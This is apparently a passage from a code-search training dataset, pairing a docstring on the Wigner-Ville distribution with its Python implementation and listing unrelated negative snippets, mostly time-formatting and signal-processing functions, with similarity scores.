seconds = delta.seconds % 60 if delta.seconds else 0\n minutes = delta.seconds // 60 % 60 if delta.seconds else 0\n hours = delta.seconds // 3600 % 24 if delta.seconds else 0\n days = abs(delta.days) % 7 if delta.days else 0\n weeks = abs(delta.days) // 7 if delta.days else 0\n parts = []\n\n if weeks > 0:\n parts.append(f'{weeks} uger')\n if days > 0:\n parts.append(f'{days} dage')\n if hours > 0:\n parts.append(f'{hours} timer')\n if minutes > 0:\n parts.append(f'{minutes} minutter')\n if seconds > 0:\n parts.append(f'{seconds} sekunder')\n\n sentence = None\n if len(parts) == 1:\n (sentence) = parts\n else:\n last = parts.pop()\n sentence = f'{\", \".join(parts)}, og {last}'\n\n if delta.days < 0:\n return f'for {sentence} siden'\n\n return f'om {sentence}'", "def time_since(dt, default=\"just now\"):\n\t\n\tnow = datetime.utcnow()\n\tdiff = now - dt\n\t\n\tperiods = (\n\t\t(diff.days / 365, \"year\", \"years\"),\n\t\t(diff.days / 30, \"month\", \"months\"),\n\t\t(diff.days / 7, \"week\", \"weeks\"),\n\t\t(diff.days, \"day\", \"days\"),\n\t\t(diff.seconds / 3600, \"hour\", \"hours\"),\n\t\t(diff.seconds / 60, \"minute\", \"minutes\"),\n\t\t(diff.seconds, \"second\", \"seconds\"),\n\t)\n\n\tfor period, singular, plural in periods:\n\t\tif period:\n\t\t\treturn \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n\treturn default", "def timestr():\n return dt.strftime(dt.now(),'%H:%M:%S')", "def get_time_string(time):\r\n mins = time // 60\r\n secs = time % 60\r\n time_string = ''\r\n\r\n if mins < 10:\r\n time_string += ' '\r\n elif mins < 100:\r\n time_string += ' '\r\n\r\n time_string += '%dm ' % mins\r\n\r\n if secs < 10:\r\n time_string += ' '\r\n\r\n time_string += '%ds' % secs\r\n\r\n return time_string", "def get_elapsed_time(start, end):\n return \"%s days, %s hours, %s minutes, %s seconds\" % dhms_from_seconds(date_diff_in_seconds(start, end))", "def time_string(time_f: float) -> str:\n m, s = divmod(time_f, 60)\n h, m = divmod(m, 60)\n\n if h < 1:\n if m < 1 and s < 1:\n msec = int(s * 1000)\n return '{:=03d}msec'.format(msec)\n\n if m < 1:\n return '{:=02.0f}sec'.format(s)\n\n return '{:=02.0f}min:{:=02.0f}sec'.format(m, s)\n else:\n return '{:=01.0f}h:{:=02.0f}min:{:=02.0f}sec'.format(h, m, s)", "def human_seconds(seconds):\n if seconds < 60:\n return '{: >5.1f} seconds'.format(seconds)\n if seconds < 60*60:\n return '{: >5.1f} minutes'.format(seconds / 60)\n return '{: >7.1f} hours'.format(seconds / (60 * 60))", "def elapsed(self):\n return str(datetime.datetime.now() - self.start).split('.')[0]", "def as_duration(abs_time_in_seconds):\n\n durations = (\n ('s', 1),\n ('m', 60),\n ('h', 60 * 60),\n ('d', 60 * 60 * 24),\n ('w', 60 * 60 * 24 * 7)\n )\n\n duration = time.time() - abs_time_in_seconds\n result = \"now\"\n\n for label, length in durations:\n if length > duration:\n break\n result = \"{:.0f}{}\".format(math.ceil(duration / length), label)\n\n return result", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def format_time_since(self, timedelta: timedelta):\n\n seconds = timedelta.total_seconds()\n\n periods = [\n (_(\"day\"), _(\"days\"), 60 * 60 * 24),\n (_(\"hour\"), _(\"hours\"), 60 * 60),\n (_(\"minute\"), _(\"minutes\"), 60),\n ]\n\n strings = []\n for period_name, plural_period_name, period_seconds in periods:\n if seconds >= period_seconds:\n period_value, seconds = divmod(seconds, period_seconds)\n if period_value == 0:\n continue\n unit = plural_period_name if period_value > 1 else period_name\n strings.append(f\"{int(period_value)} {unit}\")\n\n return \", \".join(strings)", "def get_time_string(self):\n return f\"{self.year} {self.month:02} \" \\\n f\"{self.start_day:02} {self.start_hour:02} 00 {self.get_duration():6}\"", "def timesince(dt, default=\"just now\"):\n\n now = datetime.datetime.now()\n diff = now - dt\n \n periods = (\n (diff.days / 365, \"year\", \"years\"),\n (diff.days / 30, \"month\", \"months\"),\n (diff.days / 7, \"week\", \"weeks\"),\n (diff.days, \"day\", \"days\"),\n (diff.seconds / 3600, \"hour\", \"hours\"),\n (diff.seconds / 60, \"minute\", \"minutes\"),\n (diff.seconds, \"second\", \"seconds\"),\n )\n\n for period, singular, plural in periods:\n \n if period:\n return \"%d %s ago\" % (period, singular if period == 1 else plural)\n\n return default", "def timing(t):\r\n if t < 1:\r\n power = int(np.log10(t))-1\r\n num = t/10**power\r\n if abs(power) < 10:\r\n return '{0:.1f}e-0{1:.0f}s'.format(num, abs(power))\r\n return '{0:.1f}e-{1:.0f}s'.format(num, abs(power))\r\n if t >= 1 and t < 60:\r\n return '{0:.1f}s'.format(t)\r\n if t >= 60 and t < 3600:\r\n minutes = int(t/60)\r\n seconds = t-(60*minutes)\r\n return '{0:.0f}m, {1:.1f}s'.format(minutes, seconds)\r\n if t >= 3600 and t < 86400:\r\n hours = int(t/3600)\r\n minutes = int((t-(3600*hours))/60)\r\n seconds = t-(3600*hours + 60*minutes)\r\n return '{0:.0f}h, {1:.0f}m, {2:.1f}s'.format(hours, minutes, seconds)\r\n if t >= 86400 and t < 31536000:\r\n days = int(t/86400)\r\n hours = int((t-(86400*days))/3600)\r\n minutes = int((t-(86400*days + 3600*hours))/60)\r\n seconds = t - (86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}d, {1:.0f}h, {2:.0f}m, {3:.1f}s'.format(days, hours, minutes, seconds)\r\n if t >= 31536000:\r\n years = int(t/31536000)\r\n if years > 9999:\r\n years = t/31536000\r\n power = int(np.log10(years))\r\n num = years/10**power\r\n if abs(power) < 10:\r\n return '{0:.2f}e+0{1:.0f} years'.format(num, abs(power))\r\n return '{0:.2f}e+{1:.0f} years'.format(num, abs(power))\r\n days = int((t-(31536000*years))/86400)\r\n hours = int((t-(31536000*years + 86400*days))/3600)\r\n minutes = int((t-(31536000*years + 86400*days + 3600*hours))/60)\r\n seconds = t - (31536000*years + 86400*days + 3600*hours + 60*minutes)\r\n return '{0:.0f}y, {1:.0f}d, {2:.0f}h, {3:.0f}m, {4:.1f}s'.format(years, days, hours, minutes, seconds)", "def pretty_date(time=None):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"刚刚\"\n if second_diff < 60:\n return str(second_diff) + \" 秒前\"\n if second_diff < 120:\n return \"1一分钟前\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" 分钟前\"\n if second_diff < 7200:\n return \"1小时前\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" 小时前\"\n if day_diff == 1:\n return \"昨天\"\n if day_diff < 7:\n return str(day_diff) + \" 天前\"\n if day_diff < 31:\n return str(day_diff / 7) + \" 周前\"\n if day_diff < 365:\n return str(day_diff / 30) + \" 个月前\"\n return str(day_diff / 365) + \" 年前\"", "def format_time(t: float):\n if t >= 60:\n return f\"{round(t / 60.0, 2)} mins\"\n else:\n return f\"{round(t, 2)} secs\"", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n return time.strftime(_format, time.localtime()) + \"\\t\"", "def get_time(self):\n return \"%02u:%02u:%02u (%d)\" % self.rtc.datetime()[4:8]", "def format_duration(seconds: float) -> str:\n if seconds < 60:\n return f'{seconds:.0f}s'\n elif seconds < 3600:\n minutes = math.floor(seconds / 60)\n seconds -= minutes * 60\n return f'{minutes}m{seconds:.0f}s'\n else:\n hours = math.floor(seconds / 3600)\n seconds -= hours * 3600\n minutes = math.floor(seconds / 60)\n seconds -= minutes * 60\n return f'{hours}h{minutes}m{seconds:.0f}s'", "def format_duration(seconds: int) -> str:\n\n if seconds == 0:\n return 'now'\n\n result = ''\n\n years = calc_years(seconds)\n days = calc_days(seconds)\n hours = calc_hours(seconds)\n minutes = calc_minutes(seconds)\n seconds = calc_seconds(seconds)\n\n if years > 0:\n result += '{}'.format(get_string(years, 'year'))\n\n if days > 0:\n if result != '':\n result += ', {}'.format(get_string(days, 'day'))\n else:\n result += '{}'.format(get_string(days, 'day'))\n\n if hours > 0:\n if result != '':\n result += ', {}'.format(get_string(hours, 'hour'))\n else:\n result += '{}'.format(get_string(hours, 'hour'))\n\n if minutes > 0:\n if result != '':\n if seconds == 0:\n result += ' and {}'.format(get_string(minutes, 'minute'))\n else:\n result += ', {}'.format(get_string(minutes, 'minute'))\n else:\n result += '{}'.format(get_string(minutes, 'minute'))\n\n if seconds > 0:\n if result != '':\n result += ' and {}'.format(get_string(seconds, 'second'))\n else:\n result += '{}'.format(get_string(seconds, 'second'))\n\n return result", "def format_seconds(duration):\n\treturn stats_utils.format_seconds(duration)", "def format_duration(seconds: Union[float, int],\n short_units: bool = True,\n keep_zeros: bool = False):\n if short_units:\n units = [(86400, 'd', 'd'), (3600, 'h', 'h'),\n (60, 'm', 'm'), (1, 's', 's')]\n else:\n units = [(86400, ' day', ' days'), (3600, ' hour', ' hours'),\n (60, ' minute', ' minutes'), (1, ' second', ' seconds')]\n\n if seconds < 0:\n seconds = -seconds\n suffix = ' ago'\n else:\n suffix = ''\n\n pieces = []\n for uvalue, uname, uname_plural in units[:-1]:\n if seconds >= uvalue:\n val = int(seconds // uvalue)\n pieces.append(f'{val:d}{uname_plural if val > 1 else uname}')\n seconds %= uvalue\n elif keep_zeros and pieces:\n pieces.append(f'0{uname}')\n\n uname, uname_plural = units[-1][1:]\n if seconds > np.finfo(np.float64).eps:\n pieces.append(f'{seconds:.4g}{uname_plural if seconds > 1 else uname}')\n elif not pieces or keep_zeros:\n pieces.append(f'0{uname}')\n\n return ' '.join(pieces) + suffix", "def format(t):\n tenths = t % 10\n seconds = (t // 10) % 60\n minutes = (t // 10) // 60\n if seconds < 10:\n seconds_str = '0' + str(seconds)\n else:\n seconds_str = str(seconds)\n t_string = str(minutes) + ':' + seconds_str + '.' + str(tenths)\n return t_string", "def _get_display_duration(self):\n duration = self.duration\n return '%dmn' % duration if duration < 60 else '%dh%dmn' % (duration / 60, duration % 60)", "def getTimeString(tm):\n if not isinstance(tm, int):\n tm = int(tm)\n\n if tm < 60:\n return '%d second%s' % (tm, 's' if tm > 1 else '')\n\n if 60 <= tm < 3600:\n tm = round(tm / 60)\n return '%d minute%s' % (tm, 's' if tm > 1 else '')\n\n tm = round(tm / 3600)\n return '%d hour%s' % (tm, 's' if tm > 1 else '')", "def timedelta_to_str(obj):\n seconds = int(obj.seconds) % 60\n minutes = int(obj.seconds / 60) % 60\n hours = int(obj.seconds / 3600) % 24\n return '%d %02d:%02d:%02d' % (obj.days, hours, minutes, seconds)", "def str_timedelta(seconds):\n\n hour_minute = \"\"\n\n if seconds > 3600:\n hour_minute += str(int(seconds / 3600.0)) + \" h \"\n\n if seconds > 60:\n hour_minute += str(int(seconds / 60) % 60) + \" min \"\n\n return hour_minute + str(seconds % 60) + \" s\"", "def relativeTime(date):\n diff = datetime.utcnow() - date\n\n if diff.days > 7 or diff.days < 0:\n return date.ctime()\n elif diff.days == 1:\n return '1 day ago'\n elif diff.days > 1:\n return '%d days ago' % diff.days\n elif diff.seconds <= 1:\n return 'just now'\n elif diff.seconds < 60:\n return '%d seconds ago' % diff.seconds\n elif diff.seconds < (60 * 2):\n return '1 minute ago'\n elif diff.seconds < (60 * 60):\n return '%d minutes ago' % (diff.seconds / 60)\n elif diff.seconds < (60 * 60 * 2):\n return '1 hour ago'\n else:\n return '%d hours ago' % (diff.seconds / (60 * 60))", "def getTimeString():\n\tfrom time import strftime\n\treturn strftime(\"%d-%m-%Y__%H-%M-%S\")", "def get_readable_time(delta):\n _m, _s = divmod(delta.seconds, 60)\n _h, _m = divmod(_m, 60)\n _d = delta.days\n if _d > 0:\n run_time = \"{}d {}h\".format(_d, _h)\n elif _h > 0:\n run_time = \"{}h {}m\".format(_h, _m)\n elif _m > 0:\n run_time = \"{}m {}s\".format(_m, _s)\n else:\n run_time = \"{}s\".format(_s)\n return run_time", "def timetext(delta, resultion = 1, bare=True):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),\r\n (60 * 60 * 24, lambda n : ungettext('day', 'days', n)),\r\n (60 * 60, lambda n: ungettext('hour', 'hours', n)),\r\n (60, lambda n: ungettext('minute', 'minutes', n)),\r\n (1, lambda n: ungettext('second', 'seconds', n))\r\n )\r\n delta = max(delta, timedelta(0))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = math.floor(since / seconds)\r\n if count != 0:\r\n break\r\n\r\n from r2.lib.strings import strings\r\n if count == 0 and delta.seconds == 0 and delta != timedelta(0):\r\n n = math.floor(delta.microseconds / 1000)\r\n s = strings.number_label % (n, ungettext(\"millisecond\", \r\n \"milliseconds\", n))\r\n else:\r\n s = strings.number_label % (count, name(int(count)))\r\n if resultion > 1:\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) / seconds2\r\n if count2 != 0:\r\n s += ', %d %s' % (count2, name2(count2))\r\n if not bare: s += ' ' + _('ago')\r\n return s", "def shorten_time(self, seconds):\n if seconds < 60:\n # less than 1 minute\n val = str(seconds) + \" sec\"\n elif seconds < 3600:\n # if the seconds is less than 1hr\n num = self.rounded_number(seconds, 60)\n if num == \"60\":\n val = '1h'\n else:\n val = num + \"m\"\n elif (seconds < 60*60*24):\n # if the number is less than 1 day\n num = self.rounded_number(seconds, 60 * 60)\n if num == \"24\":\n val = \"1d\"\n else:\n val = num + \"h\"\n else:\n num = self.rounded_number(seconds, 60*60*24)\n val = num + \"d\"\n\n return val", "def delta_fmt(delta):\n secs = delta.total_seconds()\n\n if secs < 60:\n return '%0.2d secs' % secs\n\n hours = 0\n if secs > 3600:\n hours = secs / 3600.0\n secs -= int(hours) * 3600\n\n mins = secs / 60\n secs -= mins * 60\n\n return '%0.2d:%0.2d' % (hours, mins)", "def format_time(seconds: float) -> str:\n # return str(timedelta(seconds=seconds))[2:10] if seconds != 0.0 else \"00:00.00\"\n if seconds == 0.0:\n return \"00.00\"\n elif seconds < 60.0:\n return str(timedelta(seconds=seconds))[5:10] # SS:DD, d decimal\n else:\n return str(timedelta(seconds=seconds))[2:7] # MM:SS", "def _timestamp(self):\n\n retval = []\n\n if self.log_level >= _Log.DEBUG:\n retval.append('%f: ' % (time.time() - self.start_time,))\n\n return ''.join(retval)", "def seconds2str(seconds):\n\n seconds = abs(seconds)\n days = hours = minutes = 0\n\n if seconds >= 86400:\n days = seconds / 86400\n seconds = (days - int(days)) * 86400\n\n if seconds >= 3600:\n hours = seconds / 3600\n seconds = (hours - int(hours)) * 3600\n\n if seconds >= 60:\n minutes = seconds / 60\n seconds = (minutes - int(minutes)) * 60\n\n strtime = \"\"\n strtime += f\"{int(days)}d\" if days else \"\"\n strtime += f\"{int(hours)}h\" if hours else \"\"\n strtime += f\"{int(minutes)}m\" if minutes else \"\"\n strtime += f\"{round(seconds)}s\" if seconds else \"\"\n\n return strtime if strtime else \"0s\"", "def time_amount(time_unit: str, countdown: relativedelta) -> str:\n t = getattr(countdown, time_unit)\n if t != 0 :\n return f\"{t} {time_unit}\"\n else:\n return \"\"", "def get_duration(self):\n try:\n if self.is_skipped:\n return \"00:00\"\n assert self.start_time\n assert self.stop_time\n if self.stop_time < self.start_time:\n return \"XX:XX\"\n return(\n f\"{str(int(self.stop_time - self.start_time) // 60).zfill(2)}:\"\n f\"{str(int(self.stop_time - self.start_time) % 60).zfill(2)}\")\n\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\"Please run test before getting the duration\")\n return \"XX:XX\"", "def timer(elapsed):\n hours, rem = divmod(elapsed, 3600)\n minutes, seconds = divmod(rem, 60)\n if int(seconds) == 0:\n return 'UNKNOWN'\n else:\n return '{:0>2}:{:0>2}:{:0>2}'.format(\n int(hours), int(minutes), int(seconds))", "def format_time(t):\n m, s = divmod(t, 60)\n h, m = divmod(m, 60)\n if h:\n return f\"{h:2.0f}hr {m:2.0f}min {s:4.1f}s\"\n elif m:\n return f\"{m:2.0f}min {s:4.1f}s\"\n else:\n return f\"{s:4.1f}s\"", "def lockout_duration(self, obj):\n delta = relativedelta(obj.modified, obj.created)\n return humanize_delta(delta)", "def reformat_execution_time(time_measured) -> tuple:\n d = time_measured // (3600 * 24)\n t_left = time_measured % (3600 * 24) # seconds left, not enough for a day\n h = t_left // 3600\n t_left = t_left % 3600 # seconds left, not enough for an hour\n m = t_left // 60\n t_left = t_left % 60 # seconds left, not enough for a minute\n s = t_left\n return d, h, m, s", "def timestamp():\n tmptz = time.timezone\n sign_str = '+'\n if tmptz > 0:\n sign_str = '-'\n tmptz_hours = int(tmptz / 3600)\n\n return str(\"%s%s%02d:%02d\" % (time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime()), sign_str, abs(tmptz_hours),\n int(tmptz / 60 - tmptz_hours * 60)))", "def get_incident_duration(incident):\n started = dateparse(incident.created_at)\n if incident.status == 'resolved':\n last_update = dateparse(incident.last_status_change_at)\n else:\n last_update = datetime.now()\n # Convert duration to a nice string representation\n return str(last_update - started)", "def time_to_string(value):\n if value == gst.CLOCK_TIME_NONE:\n return \"--:--:--.---\"\n ms = value / gst.MSECOND\n sec = ms / 1000\n ms = ms % 1000\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n return \"%02d:%02d:%02d.%03d\" % (hours, mins, sec, ms)", "def timestamp():\n return datetime.now().strftime('%H:%M:%S %m-%d')", "def get_submission_age(submission):\n age = datetime.utcnow().replace(tzinfo=utc) - submission.submission_time\n if age.days == 1:\n return \"1 day\"\n elif age.days > 1:\n return \"%d days\" % age.days\n elif int(age.seconds) > 3600:\n return \"%d hours\" % (age.seconds/3600)\n elif age.seconds > 120:\n return \"%d minutes\" % (age.seconds/60)\n elif age.seconds > 60:\n return \"1 minute\"\n elif age.seconds > 1:\n return \"%d seconds\" % age.seconds\n else:\n return \"1 second\"", "def get_time_stamp_str() -> str:\n return datetime.datetime.now().strftime(DateFormat)", "def compact_timesince(timesince):\n\n # Replace 'an hour', 'ago'.\n timesince = timesince.replace('an hour', '1h').replace('a minute ago', '1m').replace('ago', '')\n\n # Replace long words with letters. (2 days, 3 hours -> 2 d, 3 h)\n timesince = timesince.replace('seconds', 's').replace('second', 's')\n timesince = timesince.replace('minutes', 'm').replace('minute', 'm')\n timesince = timesince.replace('hours', 'h').replace('hour', 'h')\n timesince = timesince.replace('days', 'd').replace('day', 'd')\n timesince = timesince.replace('weeks', 'w').replace('week', 'w')\n timesince = timesince.replace('months', 'mo').replace('month', 'mo')\n timesince = timesince.replace('years', 'y').replace('year', 'y')\n\n # Remove space between digit and unit. (2 d, 3h -> 2d, 3h)\n timesince = timesince.replace('\\xa0', '')\n\n # Take only the first, usually interesting part. (2d, 3h -> 2d)\n timesince = timesince.split(',', 1)[0]\n return timesince", "def getFormattedText(self):\r\n h = \"00\"\r\n m = \"00\"\r\n s = \"00\"\r\n if(self.seconds < 10):\r\n s = \"0\" + str(self.seconds)\r\n else:\r\n s = str(self.seconds)\r\n\r\n if(self.minutes < 10):\r\n m = \"0\" + str(self.minutes)\r\n else:\r\n m = str(self.minutes)\r\n\r\n if(self.hours < 10):\r\n h = \"0\" + str(self.hours)\r\n else:\r\n h = str(self.hours)\r\n\r\n return h + \":\" + m + \":\" + s", "def beautify_length(length):\n sec = length / gst.SECOND\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n\n parts = []\n if hours:\n parts.append(ngettext(\"%d hour\", \"%d hours\", hours) % hours)\n\n if mins:\n parts.append(ngettext(\"%d minute\", \"%d minutes\", mins) % mins)\n\n if not hours and sec:\n parts.append(ngettext(\"%d second\", \"%d seconds\", sec) % sec)\n\n return \", \".join(parts)", "def timedelta_nice_repr(timedelta, display='long', sep=', '):\n if not isinstance(timedelta, datetime.timedelta):\n raise TypeError('First argument must be a timedelta.')\n result = []\n weeks = int(timedelta.days / 7)\n days = timedelta.days % 7\n hours = int(timedelta.seconds / 3600)\n minutes = int((timedelta.seconds % 3600) / 60)\n seconds = timedelta.seconds % 60\n if display == 'minimal':\n words = ['w', 'd', 'h', 'm', 's']\n elif display == 'short':\n words = [' wks', ' days', ' hrs', ' min', ' sec']\n elif display == 'long':\n words = [' weeks', ' days', ' hours', ' minutes', ' seconds']\n else:\n # Use django template-style formatting.\n # Valid values are d, g, G, h, H, i, s.\n return re.sub(r'([dgGhHis])', lambda x: '%%(%s)s' % x.group(), display) % {\n 'd': days,\n 'g': hours,\n 'G': hours if hours > 9 else '0%s' % hours,\n 'h': hours,\n 'H': hours if hours > 9 else '0%s' % hours,\n 'i': minutes if minutes > 9 else '0%s' % minutes,\n 's': seconds if seconds > 9 else '0%s' % seconds\n }\n values = [weeks, days, hours, minutes, seconds]\n for i in range(len(values)):\n if values[i]:\n if values[i] == 1 and len(words[i]) > 1:\n result.append('%i%s' % (values[i], words[i].rstrip('s')))\n else:\n result.append('%i%s' % (values[i], words[i]))\n # Values with less than one second, which are considered zeroes.\n if len(result) == 0:\n # Display as 0 of the smallest unit.\n result.append('0%s' % (words[-1]))\n return sep.join(result)", "def _get_timestamp():\n return str(int(time.time()))", "def get_remaining(self) -> str:\n hex_remaining_time = hexlify(self.message)[294:302]\n int_remaining_time_seconds = int(\n hex_remaining_time[6:8]\n + hex_remaining_time[4:6]\n + hex_remaining_time[2:4]\n + hex_remaining_time[0:2],\n 16,\n )\n return seconds_to_iso_time(int_remaining_time_seconds)" ]
[ "0.7199235", "0.6999816", "0.6862485", "0.6823745", "0.6743255", "0.6654757", "0.66247755", "0.65492713", "0.64874226", "0.64806837", "0.6469421", "0.64674145", "0.64304537", "0.6402844", "0.6387063", "0.6360706", "0.6358006", "0.6357516", "0.63572836", "0.63446885", "0.63081884", "0.6295959", "0.62707317", "0.6260188", "0.6257234", "0.6256976", "0.6242369", "0.6215239", "0.6212859", "0.6208622", "0.62054664", "0.6196602", "0.61826354", "0.616728", "0.61652344", "0.6136233", "0.6130773", "0.61242145", "0.6122973", "0.61215174", "0.61212176", "0.61143965", "0.6114291", "0.6103086", "0.609898", "0.6093879", "0.60921305", "0.6088485", "0.60852176", "0.6079304", "0.6077019", "0.607617", "0.6073762", "0.6067056", "0.6060559", "0.6054636", "0.60491985", "0.6036922", "0.6034889", "0.6032412", "0.6026117", "0.60192376", "0.59855247", "0.5980881", "0.5980455", "0.59786135", "0.5965281", "0.59572136", "0.59565634", "0.5954361", "0.5953779", "0.5953674", "0.5936866", "0.5934517", "0.59316605", "0.5930879", "0.5911246", "0.5910439", "0.5898305", "0.58880407", "0.5879729", "0.586672", "0.58639216", "0.5861097", "0.5839218", "0.5838761", "0.58375335", "0.58331656", "0.5830062", "0.58256775", "0.5817877", "0.5817564", "0.5810305", "0.5802106", "0.5799352", "0.5793889", "0.57925636", "0.57830286", "0.5779936", "0.57781005" ]
0.7168039
1
Wigner Ville Distribution and PseudoWigner Ville Distribution.
def wvd(signal, sampling_rate=1000, n_freqbins=None, analytical_signal=True, method="WignerVille"): # Compute the analytical signal if analytical_signal: signal = scipy.signal.hilbert(signal_detrend(signal)) # Pre-processing if n_freqbins is None: n_freqbins = 256 if method in ["pseudoWignerVille", "pwvd"]: fwindows = np.zeros(n_freqbins + 1) fwindows_mpts = len(fwindows) // 2 windows_length = n_freqbins // 4 windows_length = windows_length - windows_length % 2 + 1 windows = np.hamming(windows_length) fwindows[fwindows_mpts + np.arange(-windows_length // 2, windows_length // 2)] = windows else: fwindows = np.ones(n_freqbins + 1) fwindows_mpts = len(fwindows) // 2 time = np.arange(len(signal)) * 1.0 / sampling_rate # This is discrete frequency (should we return?) if n_freqbins % 2 == 0: frequency = np.hstack((np.arange(n_freqbins / 2), np.arange(-n_freqbins / 2, 0))) else: frequency = np.hstack( (np.arange((n_freqbins - 1) / 2), np.arange(-(n_freqbins - 1) / 2, 0)) ) tfr = np.zeros((n_freqbins, time.shape[0]), dtype=complex) # the time-frequency matrix tausec = round(n_freqbins / 2.0) winlength = tausec - 1 # taulens: len of tau for each step taulens = np.min( np.c_[ np.arange(signal.shape[0]), signal.shape[0] - np.arange(signal.shape[0]) - 1, winlength * np.ones(time.shape), ], axis=1, ) conj_signal = np.conj(signal) # iterate and compute the wv for each indices for idx in range(time.shape[0]): tau = np.arange(-taulens[idx], taulens[idx] + 1).astype(int) # this step is required to use the efficient DFT indices = np.remainder(n_freqbins + tau, n_freqbins).astype(int) tfr[indices, idx] = ( fwindows[fwindows_mpts + tau] * signal[idx + tau] * conj_signal[idx - tau] ) if (idx < signal.shape[0] - tausec) and (idx >= tausec + 1): tfr[tausec, idx] = ( fwindows[fwindows_mpts + tausec] * signal[idx + tausec] * np.conj(signal[idx - tausec]) + fwindows[fwindows_mpts - tausec] * signal[idx - tausec] * conj_signal[idx + tausec] ) tfr[tausec, idx] *= 0.5 # Now tfr contains the product of the signal segments and its conjugate. # To find wd we need to apply fft one more time. tfr = np.fft.fft(tfr, axis=0) tfr = np.real(tfr) # continuous time frequency frequency = 0.5 * np.arange(n_freqbins, dtype=float) / n_freqbins * sampling_rate return frequency, time, tfr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wpi(nev,mu):\n return np.sqrt(nev*eV2J**2/(mp*mu*epsilon));", "def test_wignerVille(self):\n datafile = os.path.join(os.path.dirname(__file__), 'data', 'wv.npz')\n rec = np.load(datafile)\n wv = abs(wigner_ville_spectrum(\n signal_bursts(), 10, 3.5, smoothing_filter='gauss',\n verbose=False))\n # No NaNs are supposed to be in the output.\n self.assertEqual(np.isnan(wv).any(), False)\n rms1 = rms(rec['wv_250_500_25'], wv[250:500:25])\n rms2 = rms(rec['wv_750_1000_25'], wv[750:1000:25])\n self.assertEqual(True, rms1 < 1e-6)\n self.assertEqual(True, rms2 < 1e-6)", "def Wp(self):\n from scipy.integrate import quad\n Eth = 1.22e-3\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n Wp = quad(lambda x: x * self._particle_distribution(x), Eth, np.Inf)[0]\n\n return (Wp * u.TeV).to('erg')", "def sweep25W(self):\n return 28.8", "def hellinger_weighted(mu1, sigma1, pi1, mu2, sigma2, pi2):\n sigma1norm = np.linalg.norm(sigma1)\n sigma2norm = np.linalg.norm(sigma2)\n X0 = np.zeros(mu1.shape)\n i = 2 * (sigma1norm**(1.0/4)) * (sigma2norm**(1.0/4)) * np.sqrt(2*np.pi) *\\\n gmm.mulnormpdf(X0, mu1-mu2, 2*sigma1 + 2*sigma2)\n #return np.sqrt(pi1*pi2) * (1-2*i)\n return 1-i[0]", "def wpe(nev):\n return np.sqrt(nev*eV2J**2/(me*epsilon));", "def collpi2(Te,nev,v):\n return vcrit(Te)/2./v**3*collnu(Te,nev)", "def vonMises(self):\n s = self.voigt\n return ((1 / 2) * ((s[0] - s[1])**2\n + (s[1] - s[2])**2\n + (s[2] - s[0])**2\n + 6 * (s[3]**2 + s[4]**2 + s[5]**2))) ** (1 / 2)", "def Mo96(self,dc,nu):\n return 1. + (nu**2.-1.)/dc", "def W(self):\n if not self.isVaild():\n pass\n return self.Wq() + 1.0/self.muy", "def sweep50W(self):\n return 25.9", "def _base_dist(self, *args, **kwargs):\n return tfd.TransformedDistribution(\n distribution=tfd.Uniform(low=0.0, high=1.0),\n bijector=tfp.bijectors.Invert(tfp.bijectors.Weibull(*args, **kwargs)),\n name=\"Weibull\",\n )", "def francois_viete():\n\n print(\"Francois Viete\\n==============\")\n\n iterations = 28 # 28 to 1000000000 makes no diff\n numerator = 0.0\n pi = 1.0\n\n for i in range(1, iterations + 1):\n numerator = math.sqrt(2.0 + numerator)\n pi*= (numerator / 2.0)\n \n pi = (1.0 / pi) * 2.0\n\n print(\"iterations: \" + str(iterations))\n print_as_text(pi)", "def bernstein_surface(i, j, nU, nV, u, v):\n return np.outer(comb(nU, i) * (u ** (nU - i)) * ((1 - u) ** i),\n comb(nV, j) * (v ** (nV - j)) * ((1 - v) ** j))", "def initializeDistribution(self):\n if (self.lowerBoundUsed == False and self.upperBoundUsed == False):\n self._distribution = distribution1D.BasicWeibullDistribution(self.k,self.lambdaVar,self.low)\n self.lowerBound = self.low\n self.upperBound = sys.float_info.max\n else:\n if self.lowerBoundUsed == False:\n self.lowerBound = self.low\n if self.upperBoundUsed == False:\n self.upperBound = sys.float_info.max\n self._distribution = distribution1D.BasicWeibullDistribution(self.k,self.lambdaVar,self.lowerBound,self.upperBound,self.low)", "def CuN17vol(n,h,w,V):\n Vshell = 2*ZCE_GaAs(n,V)*(h-ZCE_GaAs(n,V)) + w*ZCE_GaAs(n,V)\n Vcore = (w-2*ZCE_GaAs(n,V))*(h-ZCE_GaAs(n,V))\n return Vshell*1e14,Vcore*1e14", "def make_voigt(self):\n\n hwhm_doppler = pystark.get_fwhm_doppler(self.species, self.n_upper, self.n_lower, self.temp) / 2\n hwhm_stark = pystark.get_fwhm_stark(self.species, self.n_upper, self.n_lower, self.e_dens) / 2\n sigma_doppler = hwhm_doppler / np.sqrt(2 * np.log(2))\n\n ls_sd = np.real(wofz(((self.freq_axis - self.freq_centre) + 1j * 